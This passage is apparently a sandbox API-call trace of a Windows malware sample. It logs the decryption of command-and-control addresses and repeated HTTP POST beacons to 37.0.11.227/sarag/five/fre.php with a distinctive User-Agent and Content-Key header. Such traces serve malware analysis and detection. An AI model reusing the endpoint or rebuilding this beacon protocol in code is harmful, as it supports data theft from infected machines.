(s=0x480, buf=0x6abd08*, len=242, flags=0) returned 242 [0205.136] send (s=0x480, buf=0x6aba40*, len=159, flags=0) returned 159 [0205.136] GetProcessHeap () returned 0x690000 [0205.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0205.136] recv (in: s=0x480, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0205.211] GetProcessHeap () returned 0x690000 [0205.211] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.211] GetProcessHeap () returned 0x690000 [0205.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.212] GetProcessHeap () returned 0x690000 [0205.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0205.212] GetProcessHeap () returned 0x690000 [0205.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0205.213] closesocket (s=0x480) returned 0 [0205.213] GetProcessHeap () returned 0x690000 [0205.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0205.214] GetProcessHeap () returned 0x690000 [0205.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.215] GetProcessHeap () returned 0x690000 [0205.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0205.215] GetProcessHeap () returned 0x690000 [0205.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x980) returned 0x480 [0205.218] Sleep (dwMilliseconds=0xea60) [0205.221] GetProcessHeap () returned 0x690000 [0205.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0205.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.222] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0205.236] GetProcessHeap () returned 0x690000 [0205.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0205.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.237] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0205.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.238] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.239] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.239] GetProcessHeap () returned 0x690000 [0205.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0205.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.243] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0205.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.244] CryptDestroyKey (hKey=0x69d628) returned 1 [0205.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.245] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0205.245] GetProcessHeap () returned 0x690000 [0205.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.248] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.249] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.249] GetProcessHeap () returned 0x690000 [0205.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0205.249] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.249] GetProcessHeap () returned 0x690000 [0205.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0205.249] GetProcessHeap () returned 0x690000 [0205.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.250] GetProcessHeap () returned 0x690000 [0205.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0205.250] GetProcessHeap () returned 0x690000 [0205.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.257] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0205.264] GetProcessHeap () returned 0x690000 [0205.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0205.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.265] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0205.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.266] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.267] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.267] GetProcessHeap () returned 0x690000 [0205.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0205.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.269] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.269] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0205.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.270] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0205.270] GetProcessHeap () returned 0x690000 [0205.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.271] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0205.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.272] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0205.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.273] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0205.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0205.275] GetProcessHeap () returned 0x690000 [0205.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.275] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad9a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea60*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0205.275] GetProcessHeap () returned 0x690000 [0205.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0205.276] socket (af=2, type=1, protocol=6) returned 0x484 [0205.276] connect (s=0x484, name=0x6aea60*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0205.303] FreeAddrInfoW (pAddrInfo=0x6ad9a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea60*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0205.312] GetProcessHeap () returned 0x690000 [0205.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0205.313] GetProcessHeap () returned 0x690000 [0205.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0205.315] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.316] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.316] GetProcessHeap () returned 0x690000 [0205.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0205.316] GetProcessHeap () returned 0x690000 [0205.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.317] GetProcessHeap () returned 0x690000 [0205.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0205.317] GetProcessHeap () returned 0x690000 [0205.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0205.317] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.318] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.318] GetProcessHeap () returned 0x690000 [0205.318] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0205.318] GetProcessHeap () returned 0x690000 [0205.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.319] send (s=0x484, buf=0x6abd08*, len=242, flags=0) returned 242 [0205.319] send (s=0x484, buf=0x6aba40*, len=159, flags=0) returned 159 [0205.319] GetProcessHeap () returned 0x690000 [0205.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0205.320] recv (in: s=0x484, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0205.400] GetProcessHeap () returned 0x690000 [0205.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.401] GetProcessHeap () returned 0x690000 [0205.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0205.401] GetProcessHeap () returned 0x690000 [0205.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0205.402] GetProcessHeap () returned 0x690000 [0205.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0205.402] closesocket (s=0x484) returned 0 [0205.403] GetProcessHeap () returned 0x690000 [0205.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0205.403] GetProcessHeap () returned 0x690000 [0205.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.403] GetProcessHeap () returned 0x690000 [0205.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.403] GetProcessHeap () returned 0x690000 [0205.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4cc) returned 0x484 [0205.406] Sleep (dwMilliseconds=0xea60) [0205.407] GetProcessHeap () returned 0x690000 [0205.407] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0205.423] GetProcessHeap () returned 0x690000 [0205.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0205.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.424] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0205.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.425] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.426] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.426] GetProcessHeap () returned 0x690000 [0205.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0205.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.428] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.430] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0205.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.431] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0205.431] GetProcessHeap () returned 0x690000 [0205.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0205.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.432] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.433] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.434] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.438] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.438] GetProcessHeap () returned 0x690000 [0205.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0205.438] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.438] GetProcessHeap () returned 0x690000 [0205.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0205.439] GetProcessHeap () returned 0x690000 [0205.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.439] GetProcessHeap () returned 0x690000 [0205.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.440] GetProcessHeap () returned 0x690000 [0205.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.441] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0205.458] GetProcessHeap () returned 0x690000 [0205.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0205.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.459] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0205.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.461] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.462] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.462] GetProcessHeap () returned 0x690000 [0205.462] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0205.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.463] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.464] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0205.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.466] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0205.466] GetProcessHeap () returned 0x690000 [0205.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.469] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0205.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.471] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0205.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.472] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0205.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0205.473] GetProcessHeap () returned 0x690000 [0205.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.473] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ade50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0205.474] GetProcessHeap () returned 0x690000 [0205.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0205.474] socket (af=2, type=1, protocol=6) returned 0x488 [0205.474] connect (s=0x488, name=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0205.511] FreeAddrInfoW (pAddrInfo=0x6ade50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0205.511] GetProcessHeap () returned 0x690000 [0205.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0205.511] GetProcessHeap () returned 0x690000 [0205.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0205.512] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.513] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.513] GetProcessHeap () returned 0x690000 [0205.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0205.513] GetProcessHeap () returned 0x690000 [0205.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.513] GetProcessHeap () returned 0x690000 [0205.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0205.514] GetProcessHeap () returned 0x690000 [0205.514] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0205.514] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.515] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.515] GetProcessHeap () returned 0x690000 [0205.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0205.515] GetProcessHeap () returned 0x690000 [0205.516] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.516] send (s=0x488, buf=0x6abd08*, len=242, flags=0) returned 242 [0205.516] send (s=0x488, buf=0x6aba40*, len=159, flags=0) returned 159 [0205.517] GetProcessHeap () returned 0x690000 [0205.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0205.517] recv (in: s=0x488, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0205.602] GetProcessHeap () returned 0x690000 [0205.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.603] GetProcessHeap () returned 0x690000 [0205.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0205.603] GetProcessHeap () returned 0x690000 [0205.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0205.604] GetProcessHeap () returned 0x690000 [0205.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0205.604] closesocket (s=0x488) returned 0 [0205.606] GetProcessHeap () returned 0x690000 [0205.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0205.606] GetProcessHeap () returned 0x690000 [0205.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 